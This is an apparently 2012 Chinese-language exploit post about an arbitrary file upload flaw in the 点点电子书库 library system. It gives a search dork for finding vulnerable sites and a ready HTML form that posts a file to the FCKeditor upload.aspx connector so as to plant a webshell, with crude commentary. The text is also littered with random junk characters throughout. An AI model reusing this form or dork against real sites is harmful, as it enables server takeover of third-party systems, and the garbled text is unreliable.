主题:图书馆系统任意文件上传漏洞2 ?5 [( u; ?) k; ]; [
作者:冰锋刺客
# S; c' B) p1 z8 k# r 厂商:点击书(dianjishu.com)
. F0 k( t8 w0 _8 @- I) J( v 日期:2012-6-21. ?: [" t L0 F; B {" t
* h" y w$ e' E& }4 n% }$ ~I 概述0 t" O3 `+ {. V6 a+ e% F8 z4 j( ]
点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell' Q/ q; {, }# c) E, [6 g" y
II 简介
4 [! y: r8 a' S: Y I 关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"$ P D& t( _( A7 k0 e) [. m
补充一个漏洞+ B2 _$ _. {+ S( K* v6 W
<form id="frmUpload" enctype="multipart/form-data", E! L: k: H+ n. n; T: j* H3 ^9 |/ v3 W
action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>4 `" ~& Q8 w/ ]" k* L
<input id="btnUpload" type="submit" value="操翻他">3 n: J7 n" s5 G7 z
</form>
& `/ h4 W; @2 Z 你们懂的
& ? @* R( n d' j% s3 G' F 那傻逼提供还需要改包.
2 h; M! p3 I& ^+ W 自己看了下源代码发现fckeditor; O5 k) I: m% N+ M2 b1 W8 o6 K' b& t
直接秒杀: e8 l: w1 z' l
|